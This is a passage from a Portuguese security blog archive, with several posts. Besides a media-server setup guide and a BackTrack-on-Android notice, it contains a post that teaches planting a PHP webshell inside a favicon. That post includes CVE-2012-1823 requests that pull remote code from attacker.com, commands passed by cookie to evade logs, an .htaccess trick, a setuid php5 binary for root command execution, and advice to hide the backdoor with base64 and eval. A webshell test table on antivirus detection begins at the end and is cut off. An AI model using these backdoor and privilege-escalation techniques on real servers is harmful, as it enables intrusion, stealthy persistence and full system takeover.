<span lang="EN-US"> // if (YOUTUBE_DL_MAX_QUALITY) {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> // downloader = YOUTUBE_DL_PATH + [
'--max-quality', YOUTUBE_DL_MAX_QUALITY, '--quiet', '-o', 'DOWNLOADER_OUT',
'URI' ]<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> //} else {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> downloader = YOUTUBE_DL_PATH +
[ '--quiet', '-o', 'DOWNLOADER_OUT', 'URI' ]<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> //}<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"> // fall back to the native handler if
youtube-dl is not installed/enabled<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> profile ('YouTube') {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> pattern {<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> // extract the resource's video_id from the
URI of the standard YouTube page<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> match uri:
'^https?://(?:\\w+\\.)?youtube(-nocookie)?\\.com/watch\\?v=(?<youtube_video_id>[^&]+)'<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> }<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"> // Now, with $video_id defined, call
the builtin YouTube handler.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> // Note: the parentheses are required
for a no-arg method call<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"> </span>action {<o:p></o:p></div>
<div class="MsoNormal">
youtube()<o:p></o:p></div>
<div class="MsoNormal">
}<o:p></o:p></div>
<div class="MsoNormal">
}<o:p></o:p></div>
<div class="MsoNormal">
}<o:p></o:p></div>
<div class="MsoNormal">
Note que algumas linhas da função action foram comentada.
Fiz isso pois o youtube-dl não tem mais suporte
ao parâmetro --max-quality. Segue o link para o arquivo original: <a href="https://github.com/chocolateboy/pmsencoder/blob/master/src/main/resources/scripts/youtube.groovy">https://github.com/chocolateboy/pmsencoder/blob/master/src/main/resources/scripts/youtube.groovy</a><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Agora vamos configurar
o PS3 Media Service: <br />
<br />
Inicie o PMS<br />
Vá até a aba Configuração Geral: <br />
Na opção: Forçar IP do servidor, coloque o IP que foi escolhido para o dongle
wifi da NWM, no meu caso 192.168.1.100. <br />
<br />
Na opção Largura de Banda Máxima em
Mb/s, eu
deixei como 0, sem limite, como esta é uma rede dedicada para isso, não
faz sentido por limitações. <br />
<br />
Marque a opção prevenir modo de suspensão enquanto faz stream.<br />
<br />
Verifique se em Sistema de plugins o
PMSEncoder apareceu. Caso não tenha aparecido, você fez algo errado,
reveja a instalação do começo. <o:p></o:p></div>
<div class="MsoNormal">
Na aba Navegação / Definições de Partilha <br />
<br />
Demarque a opção Esconder Pasta
#Transcode# <br />
Este diretório é criado automaticamente pelo PSM, como o PSM tem vários plugin
para exibição de videos, ele tenta criar
uma transmissão para cada tipo de encoding (jogada genial do devel) então caso o
seu vídeo não seja suportado pelo encoder default, você pode entrar nesta pasta
e tentar reproduzir seu vídeo/musica
usando outros encoders.<o:p></o:p></div>
<div class="MsoNormal">
Em Pastas partilhadas, coloque o diretório onde estão seus filmes
e blabla.<o:p></o:p></div>
<div class="MsoNormal">
Na aba Definições de transcoding: <br />
Clique em Definições comuns de transcoding<br />
<br />
Na opção: Saltar transcode para as seguintes extensões -> Coloque as
extensões que na qual você não queira que o PSM
use encoder para envio, como disse no inicio ele faz isso on-the-fly, e
como agora nos temos uma rede bem rápida não há necessidade disso, no meu caso
as extesões que coloquei foram: mkv,avi<o:p></o:p></div>
<div class="MsoNormal">
Trick: Em alguns casos algumas TV dizem não ter suporte a
mkv ou Avi, neste caso tente apenas alterar a extensão entre estes dois tipos. <br />
<br />
Na opção: Motores de ficheiro de vídeo ->
No meu caso coloquei como Padrão o VLC Vídeo ( caso você não tenha o VLC
atualizado, atualize!). O VLC é capaz de reproduzir uma grande variedade de
tipos de encodes, portanto, desabilitei os demais. Porém, caso o vlc não
execute algum conteúdo, basta habilitar os outros e testar. Para coloca-lo como padrão, use as setas no canto
inferior esquerdo, a tomada habilita ou desabilita o player.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Motores de Streaming
de vídeo WEB. <br />
Selecione PMSEncoder como Default, e
desabilite os outros, mesmo eles como padrão o PSM tentar executa-lo com o VLC
e não funciona. Ou você pode deixar habilitado e ir no diretório #Transcode# ja mencionado e encontrar o arquivo referente
a reprodução(ID do youtube + [nome do encoder]) usando o PSMEncode, não acho
uma boa ideia caso você tenha uma lista de videos grande, pois neste
diretório ficam todas as
reproduções para todos os encoders,
então quando acabar um vídeo ele automaticamente passa para o próximo e toda
vez que ele não consegue reproduzir, aparece uma pergunta se deseja ir para o
próximo. Logo, se você quer reproduzir muito videos do youtube, desabilite os
outros encoders, assim você não terá essa interrupção pois apenas a reprodução
para o PMSEncoder será criada. <o:p></o:p></div>
<div class="MsoNormal">
<br />
Motores de streaming de áudio WEB.<br />
Para que a Difm funcione, deixe como padrão FFmpeg Web Áudio e desabilite o VLC.<o:p></o:p></div>
<div class="MsoNormal">
<br />
UPDATE:<br />
Acabei de testar com arquivos mp4 e mesmo configurando para que não haja enconding para estar extensão, o infeliz do PSM insiste em fazer isso, ou seja, problemas com travamento. <br />
Solução: Apenas renomeie de .mp4 para ,avi, assim o encoding não será executado.<br />
<br /></div>
<div class="MsoNormal">
Pronto! Clique em Guardar no topo do tela e clique em
Reiniciar Servidor.<br />
Agora na na sua TV e seja feliz! <br />
Obs: Quando o programa é fechado, algumas dessas configurações podem se perder
ou eu fiz alguma merda, então confira tudo quando for usar o PSM novamente.<o:p></o:p></div>
<div class="MsoNormal">
<br />
Segurança:<br />
Utilize uma senha forte tanto na Rede particular quanto na NWM. Por mais que a NWM esteja fora
da internet, alguém pode entrar caso você utilize uma senha fraca. <br />
Recomendações: <br />
Use WP2+AES em ambas as redes.<br />
Desabilite o WPS em ambas as redes.<br />
Deixe o pc/notebook com firewall
habilitado, libere apenas a porta usada pelo PSM (5001)<br />
Na sua rede particular crie um filtro de MAC no roteador e cadastre somente os
dispositivos que você conhece.<br />
<br />
<o:p></o:p></div>
<br />
<div class="MsoNormal">
Conclusão: <br />
Já assisti todas os episódios disponíveis de Mr. Robot.<br />
Não tenho mais problemas com loading e encoding.<br />
Quando desligo ou desconecto meu notebook, a NWM fica isolada da internet. <br />
Não tenho milhões de cabos ligados na
TV.<br />
Foi chato e demorado pra caralho fazer isso, devidor a falta ou a má
documentação, mas ao mesmo tempo bem gratificante ver tudo funcionando no final.<br />
<br />
Próximos desafios para melhorar a NWM: <br />
Integração com Popcorntime.<br />
Streaming da área de trabalho.<br />
Ligação da TV com a HomeTheather sem cabos. Não fiz porque não comprei o HomeTheater ainda! Uahsaushauhsa<br />
Tem alguma sugestão? Call me! @crashbrz ou #dclabs @ freenode<o:p></o:p></div>
Unknownnoreply@blogger.com8Kraków, Poland50.064650099999987 19.94497990000002149.901503099999985 19.622256400000023 50.227797099999989 20.26770340000002tag:blogger.com,1999:blog-2185986060583872831.post-78117585689076055842012-10-10T13:10:00.000-07:002012-10-10T14:00:55.038-07:00[DcLabs] - Executando o BackTrack 5 no Android<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-cKBiR6eD82w/UHXSAsl0nVI/AAAAAAAAABE/yfP-POr8eKs/s1600/Screenshot_2012-09-30-12-31-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-cKBiR6eD82w/UHXSAsl0nVI/AAAAAAAAABE/yfP-POr8eKs/s640/Screenshot_2012-09-30-12-31-48.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Este paper foi inspirado na palestra “Hacking from the Restroom” do pesquisador brasileiro Bruno Gonçalves apresentado na conferência de segurança “HITB MALAYSIA” em 2009; e baseado no projeto “Linux on Android”.<br />
Vamos mostrar como é possível executar o BackTrack em seu smartphone e utilizá-lo para realizar um pentest básico onde seu notebook não pode ir com você.</div>
<div style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
O paper e demais arquivos necessários podem ser acessados por este link: <a href="https://docs.google.com/open?id=0B8FxJ0KnE3nrUWdrRVBVYUZLdjQ">https://docs.google.com/open?id=0B8FxJ0KnE3nrUWdrRVBVYUZLdjQ</a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--CI--gwUihs/UHXSFdJXlDI/AAAAAAAAABM/iSrS-anSAvM/s1600/Screenshot_2012-10-02-14-20-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/--CI--gwUihs/UHXSFdJXlDI/AAAAAAAAABM/iSrS-anSAvM/s640/Screenshot_2012-10-02-14-20-59.png" width="640" /></a></div>
<br />
By: Rêner Alberto (Gr1nch)<br />
Twitter: @Gr1nchDc<br />
irc.freenode.net /j #DcLabsGr1nchhttp://www.blogger.com/profile/04028945163459162220noreply@blogger.com6tag:blogger.com,1999:blog-2185986060583872831.post-75590358062824989622012-08-23T16:01:00.001-07:002012-08-23T16:01:16.455-07:00Backdoor PHP Favicon/Imagens - Web Shell RootBom pessoal, vou iniciar este post esclarecendo algumas coisas:<br />
<br />
A alguns dias foi levantada uma discussão sobre LFI´s e RFI por causa da falha do <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823" target="_blank">PHP CGI</a>.<br />
Resumindo, ao se fazer um RFI nesta falha pouco importa qual seja a extensão do arquivo incluído, podendo ser .txt, .gif, .jpg, .ico ou té mesmo .php, desde que, o servidor onde o arquivo .php esteja hospedado não faça interpretação.<br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.txt</span><br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.gif</span><br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.php</span><br />
<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;"><br /></span>
Como mencionei, no 3 exemplo o servidor attacker não pode ter/fazer interpretação de arquivos .php<br />
Mais pra baixo vou explicar porque o extensão não faz diferença.<br />
<br />
Vamos ao que interessa:<br />
<br />
A ideia aqui é implantar um backdoor acessá-lo através de LFI de uma forma não muito usual.<br />
Para isto vamos usar o <a href="http://en.wikipedia.org/wiki/Favicon" target="_blank">Favicon</a>, ele foi escolhido pois fiz vários testes com figuras e muitas apresentaram problemas de execução do código devido ao caracteres utilizados a formação da imagem, já a Favicon é bem simples e possui poucos caracteres, diminuindo assim a possibilidade de problemas de execução.<br />
<br />
Criei um favicon <a href="http://www.favicon.cc/" target="_blank">neste site</a>, bem simples, apenas escrito DC com letras azuis.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yxUwH1tn3Zc/UDVv9MFmZWI/AAAAAAAAAU8/tuJS3xtnDqQ/s1600/ScreenHunter_06+Aug.+22+20.48.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="311" src="http://4.bp.blogspot.com/-yxUwH1tn3Zc/UDVv9MFmZWI/AAAAAAAAAU8/tuJS3xtnDqQ/s320/ScreenHunter_06+Aug.+22+20.48.jpg" width="320" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
<br />
Vamos dar uma olhada nele no editor hexa:<br />
<br /></div>
<br />
<br />
<br />
<a href="http://1.bp.blogspot.com/-JIviuuIdCCo/UDVw0174aOI/AAAAAAAAAVE/F3psWqLY17g/s1600/ScreenHunter_07+Aug.+22+20.52.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-JIviuuIdCCo/UDVw0174aOI/AAAAAAAAAVE/F3psWqLY17g/s1600/ScreenHunter_07+Aug.+22+20.52.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
No Chrome ele é exibido no canto esquerdo superior da aba:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-V2qJXDk9zcA/UDVxczTknuI/AAAAAAAAAVM/mQYm1Mw9fG0/s1600/ScreenHunter_08+Aug.+22+20.54.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-V2qJXDk9zcA/UDVxczTknuI/AAAAAAAAAVM/mQYm1Mw9fG0/s1600/ScreenHunter_08+Aug.+22+20.54.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
No IE ele fica na barra de endereços:<br />
<br />
<br />
<a href="http://2.bp.blogspot.com/-MBX3lm5Q4D0/UDVx8zJT7oI/AAAAAAAAAVU/mJ97zWsvEhM/s1600/ScreenHunter_09+Aug.+22+20.57.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MBX3lm5Q4D0/UDVx8zJT7oI/AAAAAAAAAVU/mJ97zWsvEhM/s1600/ScreenHunter_09+Aug.+22+20.57.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Acesso direto:<br />
<br />
<br />
<br />
<a href="http://3.bp.blogspot.com/-upWh4tI-Ozo/UDVybeVvu4I/AAAAAAAAAVc/KfCCtWcrH4w/s1600/ScreenHunter_10+Aug.+22+20.59.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-upWh4tI-Ozo/UDVybeVvu4I/AAAAAAAAAVc/KfCCtWcrH4w/s1600/ScreenHunter_10+Aug.+22+20.59.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Agora vamos altera-lo e acrescentar a seguinte linha:<br />
<?php system($_GET['cmd']; ?> Que efetivamente vai ser nosso backdoor.<br />
Você pode trocar a função system pela sua de preferencia.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A6cbm8nN9RY/UDV0IlIcDII/AAAAAAAAAVs/BaSkDvlLHEI/s1600/ScreenHunter_12+Aug.+22+21.06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-A6cbm8nN9RY/UDV0IlIcDII/AAAAAAAAAVs/BaSkDvlLHEI/s1600/ScreenHunter_12+Aug.+22+21.06.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ao fazer o request novamente, ele continua a ser visualizado sem problemas, mesmo depois do código PHP ter sido acrescentado. Até ai tudo ok!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-xFi5SONwbyw/UDV5WhhpSlI/AAAAAAAAAWE/xOeLe3cqN0U/s1600/ScreenHunter_14+Aug.+22+21.28.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-xFi5SONwbyw/UDV5WhhpSlI/AAAAAAAAAWE/xOeLe3cqN0U/s1600/ScreenHunter_14+Aug.+22+21.28.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Agora fazemos o include do arquivo e passamos os comandos:<br />
http://srvlfi.dc/lfi.php?inc=favicon.ico&cmd=id
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PY-3oQnyVF0/UDV80ltqi8I/AAAAAAAAAWU/rH4YnGBBH3Y/s1600/ScreenHunter_17+Aug.+22+21.43.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-PY-3oQnyVF0/UDV80ltqi8I/AAAAAAAAAWU/rH4YnGBBH3Y/s1600/ScreenHunter_17+Aug.+22+21.43.jpg" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Depois disso tudo, vamos entender o porque isso acontece:<br />
<br />
A função include (e similares) do PHP, ignoram complemente a extensão do arquivo e joga todo seu conteúdo para dentro do .php base, neste caso o lfi.php, então, oque interessa é somente o conteúdo do arquivo. O PHP por sua vez ao encontrar um novo <?php, executa o código até encontrar ?>, ou seja, o final das instruções PHP para aquele bloco de código.<br />
<br />
O problema de usar esta técnica é o lixo exibido na tela, justamente pelo comportamento das funções de include, que jogam o conteúdo do arquivo até achar os marcadores do PHP.<br />
<br />
<br />
Outro ponto importante seria utilizar cookies para passar os comandos para o PHP, assim, seria evitado que os comandos fossem enviados por GET ou POST e poluindo ainda mais o Log do servidor.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A2QIsUvLf8A/UDYbQub3Q3I/AAAAAAAAAWk/JkIvHG-MM90/s1600/ScreenHunter_01+Aug.+23+08.58.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-A2QIsUvLf8A/UDYbQub3Q3I/AAAAAAAAAWk/JkIvHG-MM90/s1600/ScreenHunter_01+Aug.+23+08.58.gif" /></a></div>
<br />
<br />
<br />
<br />
<br />
Log sem cookie: [23/Aug/2012:08:59:38 -0300] "GET /lfi.php?lfi=oi2.gif&cmd=uname%20-a HTTP/1.1" 200 384 "-" "Mozilla/5.0<br />
<br />
Log utilizando comando por cookie: [23/Aug/2012:09:01:13 -0300] "GET /lfi.php?lfi=oi.gif HTTP/1.1" 200 384 "-" "Mozilla/5.0<br />
<br />
O código para esta implementação é bem simples:<br />
<br />
setcookie("cmd_cookie", "id");<br />
system($_COOKIE["cmd_cookie"]);<br />
<br />
Basta alterar o valor do cookie com sua ferramentas preferida.<br />
<br />
Fazendo uma pesquisa rápida junto com o Psylon, encontramos este <a href="https://bechtsoudis.com/hacking/php-code-into-jpeg-metadata-from-hide-to-unhide/" target="_blank">Post</a>, que fala sobre adicionar código php em imagem, porém, é necessário adicionar informação no htaccess. Esta linha irá fazer com que o interpretador do php entende que arquivos .jpg também sejam interpretados.<br />
<br />
<span style="color: red; font-family: monospace; font-size: 12px; line-height: 13px; margin: 0px; padding: 0px;">root@webtestbed</span><span style="background-color: #cccccc; font-family: monospace; font-size: 12px; line-height: 13px;">:</span><span style="color: blue; font-family: monospace; font-size: 12px; line-height: 13px; margin: 0px; padding: 0px;">/var/www/media</span><span style="background-color: #cccccc; font-family: monospace; font-size: 12px; line-height: 13px;"># echo “AddType application/x-httpd-php .jpg” >> .htaccess</span><br />
<br />
Agora partindo so suposto que que isso tudo que fizemos é um pós exploitation e que o pesquisador acima fez alterações em arquivos foi feito o seguinte:<br /><br />Setado um suid no binário do php<br /><br />chmod 4755 /usr/bin/php5 (o endereço pode/vai variar de acordo o sabor do linux)<br /><br />
root@srvlfi:/var/www# ls -al /usr/bin/php5<br />
-rwsr-xr-x 1 root root 7463060 2012-02-11 05:07 /usr/bin/php5<br /><br />Criado um icone com nome de suid.ico com o seguinte código(claro, no final do arquivo depois do código do próprio ícone):<br /><br />
<?php<br />
posix_seteuid(0);<br />
passthru($argv[1]);<br />
?><br />
<div>
<br /></div>
<br />
Neste caso foi utilizada a variável <a href="http://php.net/manual/en/reserved.variables.argv.php" target="_blank">$argv[1]</a> para receber o valor, pois mesmo com suid no binário do php não possível elevar o privilégio utilizado a <a href="http://www.php.net/manual/en/function.posix-seteuid.php" target="_blank">posix_seteuid</a>, devido a arquitetura e proteções empregadas(nem sempre foi assim), então, para contornar, a ideia foi fazer a própria backdoor executar o binário suid do php passando o caminho do ícone maligno jutamente com comando a ser executado como root. Como podem ver na abaixo, logo $argv[1] tem o valor id;uname -a<br />
<br />
<a href="http://srvlfi.dc/oi.php?cmd=/usr/bin/php5%20/var/www/suid.ico%20%22id;uname%20-a%22">http://srvlfi.dc/oi.php?cmd=/usr/bin/php5%20/var/www/suid.ico%20%22id;uname%20-a%22</a><br /><br />Obs: Para comandos com argumentos por exemplo uname -a, é necessário utilizar aspas duplas, para indicar que o comando é apenas um, caso contrário, o php irá entender que "-a" é o terceiro argumento do array - $argv[2]<br /><br />E sim, TERCEIRO argumento, caso tenha dúvida consulte o link de $argv[1].<br />
<br />
<a href="http://2.bp.blogspot.com/-SvnWwd-tGeo/UDaxoqOyKII/AAAAAAAAAW0/vJyM8CDuEeA/s1600/ScreenHunter_18+Aug.+23+19.41.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SvnWwd-tGeo/UDaxoqOyKII/AAAAAAAAAW0/vJyM8CDuEeA/s1600/ScreenHunter_18+Aug.+23+19.41.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Outra dica é: Caso o código do seu backdoor esteja ficando grande, use as funções de enconding base64 e a função eval do php.<br />
<br />
<br />
Espero ter contribuído.<br /><br />Thanks to: @l0c4lh05t - @gmlnet<br />Me: @crashbrz<br />
<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-44174505706901717202012-08-07T07:38:00.000-07:002012-08-07T12:06:50.570-07:00Resultado dos testes com Psafe Protege AntiVirus<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.acidezmental.xpg.com.br/imagens/psafe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.acidezmental.xpg.com.br/imagens/psafe.jpg" /></a></div>
<br />
O Psafe Protege mesmo?<br />
<br />
Bem, inicialmente gostaria de dizer que esta pesquisa em momento algum quis comparar o Psafe com qualquer outro AV. do mercado.<br />
<br />
Detalhe da pesquisa:<br />
<br />
Sistema Operacional utilizado: Windows 2003 Server R2<br />
AV: Psafe Protege<br />
Software Adicional: IIS6 (Apenas para testes com webshells)<br />
<br />
Abaixo a tabela com os testes realizados:<br />
<style>html {overflow:visible};</style><style>.tblGenFixed td {padding:0 3px;overflow:hidden;white-space:normal;letter-spacing:0;word-spacing:0;background-color:#fff;z-index:1;border-top:0px none;border-left:0px none;border-bottom:1px solid #CCC;border-right:1px solid #CCC;} .dn {display:none} .tblGenFixed td.s0 {background-color:#ff0000;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-top:1px solid black;border-right:1px solid black;border-bottom:1px solid black;border-left:1px solid black;} .tblGenFixed td.s2 {background-color:#999999;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-top:1px solid black;border-right:;border-bottom:1px solid black;} .tblGenFixed td.s1 {background-color:#999999;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-top:1px solid black;border-right:1px solid black;border-bottom:1px solid black;} .tblGenFixed td.s16 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:;border-left:1px solid #CCC;} .tblGenFixed td.s17 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;} .tblGenFixed td.s18 {background-color:#ff0000;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;border-left:1px solid #CCC;} .tblGenFixed td.s19 {background-color:#d9d9d9;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;border-left:1px solid black;} .tblGenFixed td.s9 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:;} .tblGenFixed td.s12 {background-color:#ff0000;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;border-left:1px solid black;} .tblGenFixed td.s13 {background-color:#999999;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;} .tblGenFixed td.s7 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:;} .tblGenFixed td.s14 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:;} .tblGenFixed td.s8 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:;border-left:1px solid #CCC;} .tblGenFixed td.s15 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:;} .tblGenFixed td.s5 {background-color:#d9d9d9;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;border-left:1px solid black;} .tblGenFixed td.s6 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;color:#000000;text-decoration:none;text-align:left;vertical-align:bottom;direction:auto-ltr;white-space:normal;overflow:hidden;border-right:1px solid black;border-bottom:1px solid black;} .tblGenFixed td.s3 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-top:1px solid #CCC;border-right:;border-bottom:;} .tblGenFixed td.s10 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:1px solid black;border-left:1px solid #CCC;} .tblGenFixed td.s11 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-right:;border-bottom:1px solid black;} .tblGenFixed td.s4 {background-color:white;font-family:arial,sans,sans-serif;font-size:100.0%;font-weight:normal;font-style:normal;text-decoration:none;vertical-align:bottom;direction:Context;white-space:normal;overflow:hidden;border-top:1px solid #CCC;border-right:;border-bottom:;} </style><br />
<table border="0" cellpadding="0" cellspacing="0" class="tblGenFixed" dir="ltr" id="tblMain"><tbody>
<tr class="rShim"><td class="rShim" style="width: 0;"></td><td class="rShim" style="width: 211px;"></td><td class="rShim" style="width: 120px;"></td><td class="rShim" style="width: 120px;"></td><td class="rShim" style="width: 158px;"></td><td class="rShim" style="width: 155px;"></td><td class="rShim" style="width: 156px;"></td><td class="rShim" style="width: 203px;"></td><td class="rShim" style="width: 120px;"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s0" dir="ltr">Webshells</td><td class="s1" dir="ltr">Encoding</td><td class="s1" dir="ltr">Extensao alterada</td><td class="s1" dir="ltr">Detecção na gravação?</td><td class="s1" dir="ltr">Detecção na execução?</td><td class="s2" dir="ltr">Detecção Manual Scan?</td><td class="s3"><br /></td><td class="s4"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
